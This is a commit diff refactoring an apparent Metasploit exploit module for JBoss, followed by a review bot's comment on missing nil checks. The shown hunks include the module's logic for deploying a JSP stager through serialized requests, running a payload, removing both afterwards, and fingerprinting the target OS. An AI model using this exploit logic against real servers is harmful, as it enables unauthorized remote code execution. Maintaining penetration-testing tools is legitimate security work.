Switch variable from file_name to operation
parent
b003d8f750
commit
4c72b096b6
|
@ -88,9 +88,9 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
res = send_serialized_request('version.bin')
|
||||
res = send_serialized_request('version')
|
||||
if res.nil?
|
||||
vprint_error("Connection timed out")
|
||||
vprint_error('Connection timed out')
|
||||
return Exploit::CheckCode::Unknown
|
||||
elsif res.code != 200
|
||||
vprint_error("Unable to request version, returned http code is: #{res.code.to_s}")
|
||||
|
@ -103,7 +103,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_5_/
|
||||
|
||||
if res.body =~ /ServletException/ # Simple check, if we caused an exception.
|
||||
vprint_status("Target seems vulnerable, but the used JBoss version is not supported by this exploit")
|
||||
vprint_status('Target seems vulnerable, but the used JBoss version is not supported by this exploit')
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
|
@ -134,8 +134,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'jsp_code' => generate_stager(name_parameter, content_parameter)
|
||||
}
|
||||
|
||||
print_status("Deploying stager")
|
||||
send_serialized_request('installstager.bin', replace_values)
|
||||
print_status('Deploying stager')
|
||||
send_serialized_request('installstager', replace_values)
|
||||
print_status("Calling stager: #{stager_uri}")
|
||||
call_uri_mtimes(stager_uri, 5, 'GET')
|
||||
|
||||
|
@ -167,14 +167,14 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
res = call_uri_mtimes(payload_uri,5, 'GET')
|
||||
|
||||
# Remove the payload through stager
|
||||
print_status("Removing payload through stager")
|
||||
print_status('Removing payload through stager')
|
||||
delete_payload_uri = stager_uri + "?#{name_parameter}=#{app_base}"
|
||||
res = send_request_cgi({'uri' => delete_payload_uri})
|
||||
|
||||
# Remove the stager
|
||||
print_status("Removing stager")
|
||||
send_serialized_request('removestagerfile.bin', replace_values)
|
||||
send_serialized_request('removestagerdirectory.bin', replace_values)
|
||||
print_status('Removing stager')
|
||||
send_serialized_request('removestagerfile', replace_values)
|
||||
send_serialized_request('removestagerdirectory', replace_values)
|
||||
|
||||
handler
|
||||
end
|
||||
|
@ -225,28 +225,28 @@ EOT
|
|||
end
|
||||
|
||||
|
||||
def send_serialized_request(file_name , replace_params = {})
|
||||
def send_serialized_request(operation , replace_params = {})
|
||||
data = ''
|
||||
case file_name
|
||||
when 'version.bin'
|
||||
case operation
|
||||
when 'version'
|
||||
data = build_get_version.encode
|
||||
when 'osname.bin'
|
||||
when 'osname'
|
||||
data = build_get_os.encode
|
||||
when 'osarch.bin'
|
||||
when 'osarch'
|
||||
data = build_get_arch.encode
|
||||
when 'installstager.bin'
|
||||
when 'installstager'
|
||||
data = build_install_stager(
|
||||
war_name: replace_params['regex_app_base'],
|
||||
jsp_name: replace_params['regex_jsp_name'],
|
||||
data: replace_params['jsp_code']
|
||||
).encode
|
||||
when 'removestagerfile.bin'
|
||||
when 'removestagerfile'
|
||||
data = build_delete_stager_file(
|
||||
dir: "#{replace_params['regex_app_base']}.war",
|
||||
file: replace_params['regex_jsp_name'],
|
||||
extension: '.jsp'
|
||||
).encode
|
||||
when 'removestagerdirectory.bin'
|
||||
when 'removestagerdirectory'
|
||||
data = build_delete_stager_file(
|
||||
dir: './',
|
||||
file: replace_params['regex_app_base'],
|
||||
|
@ -269,7 +269,7 @@ EOT
|
|||
|
||||
|
||||
unless res && res.code == 200
|
||||
print_error("Failed: Error requesting preserialized request #{file_name}")
|
||||
print_error("Failed: Error requesting preserialized request #{operation}")
|
||||
return nil
|
||||
end
|
||||
|
||||
|
@ -335,8 +335,8 @@ EOT
|
|||
|
||||
# Try to autodetect the target platform
|
||||
def detect_platform
|
||||
print_status("Attempting to automatically detect the platform")
|
||||
res = send_serialized_request("osname.bin")
|
||||
print_status('Attempting to automatically detect the platform')
|
||||
res = send_serialized_request('osname')
|
||||
|
||||
if res.body =~ /(Linux|FreeBSD|Windows)/i
|
||||
os = $1
|
||||
|
@ -353,8 +353,8 @@ EOT
|
|||
|
||||
# Try to autodetect the architecture
|
||||
def detect_architecture
|
||||
print_status("Attempting to automatically detect the architecture")
|
||||
res = send_serialized_request("osarch.bin")
|
||||
print_status('Attempting to automatically detect the architecture')
|
||||
res = send_serialized_request('osarch')
|
||||
if res.body =~ /(i386|x86)/i
|
||||
arch = $1
|
||||
if arch =~ /i386|x86/i
|
||||
|
|
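Review bot: `detect_platform` and `detect_architecture` dereference `res.body` right after `res = send_serialized_request('osname')` and `send_serialized_request('osarch')`, but the @ -269 hunk shows `send_serialized_request` returning `nil` whenever the response is missing or not HTTP 200, so a timeout or error response raises NoMethodError instead of ending with a clear message. `check` already guards this case with `if res.nil?`; the two detection methods should do the same, for example `return nil unless res` before the regex match, with the return value adjusted to whatever their callers treat as "not detected". Both method bodies continue outside the hunks, so the right fallback value is not visible here. Separately, now that the argument is an operation name rather than a file name, a short comment above `send_serialized_request` listing the accepted operation strings would help, since a mistyped literal would presumably leave `data` as `''`.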